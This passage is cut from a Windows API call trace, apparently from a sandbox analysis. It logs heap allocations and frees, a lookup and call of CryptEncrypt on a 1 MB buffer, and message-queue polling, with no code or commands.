(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0198.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0198.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0198.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0198.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0198.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0198.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0198.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0198.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0198.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0198.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0198.224] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0198.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0198.225] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0198.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0198.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0198.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0198.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0198.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0198.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.229] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0198.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0198.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1186020 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0198.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0198.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0198.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0198.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0198.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129a020 [0198.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0198.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13a7020 [0198.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0198.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0198.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0198.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0198.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0198.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, 